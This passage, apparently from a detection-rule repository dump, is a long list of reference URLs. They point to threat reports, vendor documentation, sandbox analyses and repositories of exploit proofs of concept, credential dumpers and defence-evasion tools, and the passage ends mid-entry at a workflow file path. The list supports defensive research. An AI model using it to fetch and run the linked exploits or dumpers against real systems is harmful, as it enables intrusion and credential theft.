https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n- https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure\n- https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\n- https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md\n- https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php\n- https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior\n- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\n- https://github.com/TwoSevenOneT/WSASS\n- https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/\n- https://github.com/JohnHammond/recaptcha-phish\n- https://labs.nettitude.com/blog/introducing-sharpwsus/\n- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/\n- https://redcanary.com/blog/threat-intelligence/msix-installers/\n- https://gtfobins.github.io/gtfobins/gawk/#shell\n- https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/\n- https://man7.org/linux/man-pages/man2/syslog.2.html\n- https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\n- https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\n- https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/\n- https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/\n- https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n- https://redcanary.com/blog/threat-detection/process-masquerading/\n- https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\n- https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091\n- https://github.com/msanft/CVE-2025-55182\n- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n- https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n- https://github.com/h4rmy/KDU\n- https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\n- https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493\n- https://securelist.com/notepad-supply-chain-attack/118708/\n- https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder\n- https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/\n- https://asec.ahnlab.com/en/40263/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673\n- https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/\n- https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement\n- https://github.com/rtecCyberSec/BitlockMove\n- https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md\n- https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\n- https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/\n- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\n- https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n- https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n- https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n- https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n- https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/\n- https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html\n- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking\n- https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/\n- https://mrd0x.com/filefix-clickfix-alternative/\n- https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\n- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4\n- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\n- https://gtfobins.github.io/gtfobins/capsh/#shell\n- https://intel.thedfirreport.com/eventReports/view/70\n- http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\n- https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/\n- https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/\n- https://x.com/Max_Mal_/status/1826179497084739829\n- https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n- https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/\n- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054\n- https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad\n- https://www.scip.ch/en/?labs.20240523\n- https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/\n- https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n- https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\n- https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\n- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n- https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n- https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/\n- https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval\n- https://nodejs.org/api/child_process.html#class-childprocess\n- https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\n- https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/\n- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n- https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws\n- https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html\n- https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/\n- https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store\n- https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n- https://x.com/Threatlabz/status/1879956781360976155\n- https://github.com/rapid7/metasploit-framework/issues/11337\n- https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\n- https://tria.ge/240731-jh4crsycnb/behavioral2\n- https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1\n- https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468\n- https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33\n- https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n- https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n- https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\n- https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\n- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n- https://itm4n.github.io/cdpsvc-dll-hijacking/\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n- https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n- https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n- https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n- https://megatools.megous.com/\n- https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\n- https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n- https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png\n- https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/\n- https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\n- https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt\n- https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action\n- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel\n- https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216\n- https://trustedsec.com/blog/command-line-underdog-wmic-in-action\n- https://github.com/mulwareX/CVE-2025-6218-POC\n- https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n- https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/\n- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\n- https://www.fortiguard.com/psirt/FG-IR-24-535\n- https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/\n- https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n- https://x.com/JangPr0/status/1932034543026065833\n- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n- https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n- https://www.group-ib.com/resources/threat-research/red-curl-2.html\n- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/\n- https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n- https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n- https://github.com/rtecCyberSec/SpeechRuntimeMove\n- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address\n- https://x.com/0x534c/status/1944694507787710685\n- https://www.loobins.io/binaries/nscurl/\n- https://gtfobins.github.io/gtfobins/gcc/#shell\n- https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage\n- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\n- https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\n- https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html\n- https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\n- https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall\n- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n- https://www.loobins.io/binaries/pbpaste/\n- https://news.ycombinator.com/item?id=29504755\n- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html\n- https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\n- https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8\n- https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/\n- https://juggernaut-sec.com/capabilities/#cap_setuid\n- https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/\n- https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron\n- http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n- https://notepad-plus-plus.org/news/v889-released/\n- https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50\n- https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/\n- https://cert.gov.ua/article/6284080\n- https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html\n- https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n- https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\n- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n- https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/\n- https://www.security.com/threat-intelligence/medusa-ransomware-attacks\n- https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n- https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n- https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n- https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\n- https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3\n- https://manual.cs50.io/2/personality\n- https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\n- https://en.wikipedia.org/wiki/Right-to-left_override\n- https://www.attackiq.com/2023/09/20/emulating-rhysida/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038\n- https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging\n- https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy\n- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\n- https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/\n- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n- https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py\n- https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior\n- https://github.com/logangoins/Krueger/tree/main\n- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf\n- https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\n- https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/\n- https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled\n- https://github.com/varwara/CVE-2024-35250\n- https://linux.die.net/man/8/auditct\n- https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware\n- https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed\n- https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n- https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability\n- https://bazaar.abuse.ch/browse/tag/one/\n- https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\n- https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\n- https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n- https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm\n- https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/\n- https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n- https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV\n- https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\n- https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732\n- https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11\n- https://jgspiers.com/audit-group-policy-changes/\n- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings\n- https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md\n- https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n- https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\n- https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/\n- https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\n- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md\n- https://x.com/0gtweet/status/1564131230941122561\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741\n- https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins\n- https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251\n- https://www.man7.org/linux/man-pages/man1/systemctl.1.html\n- https://gtfobins.github.io/gtfobins/rsync/#shell\n- https://www.trendmicro.com/en_us/research/25/f/water-curse.html\n- https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump\n- https://www.youtube.com/watch?v=uSYvHUVU8xY\n- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616\n- https://man7.org/linux/man-pages/man1/dmesg.1.html\n- https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\n- https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf\n- https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf\n- https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\n- https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site\n- https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n- https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3\n- https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation\n- https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials\n- https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure\n- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n- https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity\n- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\n- https://docs.python.org/3/library/http.server.html\n- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\n- https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today\n- https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/\n- https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\n- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country\n- http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n- https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n- https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n- https://restic.net/\n- https://woshub.com/disable-credential-guard-windows/\n- https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/\n- https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97\n- https://tria.ge/241231-j9yatstqbm/behavioral1\n- https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install\n- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n- https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n- https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/\n- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\n- https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start\n- https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\n- https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\n- https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\n- https://cert.gov.ua/article/6277849\n- https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0\n- https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect\n- https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml\n- https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n- https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm\n- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\n- https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows\n- https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/\n- https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\n- https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7\n- https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n- https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html\n- https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\n- https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware\n- https://www.joesandbox.com/analysis/1467354/0/html\n- https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm\n- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently\n- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\n- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44\n- https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous\n- https://us-cert.cisa.gov/ncas/alerts/aa21-259a\n- https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002\n- https://redcanary.com/threat-detection-report/techniques/installer-packages/\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal\n- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\n- https://blog.sekoia.io/scattered-spider-laying-new-eggs/\n- https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection\n- https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions\n- https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48\n- https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123\n- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\n- https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/\n- https://man7.org/linux/man-pages/man8/setcap.8.html\n- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/\n- http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n- https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/\n- https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository\n- https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis\n- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration\n- https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\n- https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\n- https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample\n- https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30\n- https://adsecurity.org/?p=1785\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\n- https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/\n- https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4\n- https://huntress.com/blog/esxi-vm-escape-exploit\n- https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/\n- https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/\n- https://docs.datadoghq.com/security/default_rules/719-39f-9cd/\n- https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm\n- https://taggart-tech.com/evildeno/\n- https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f\n- https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7\n- https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2\n"
  },
  {
    "path": ".github/workflows/goodlog-tests.yml",
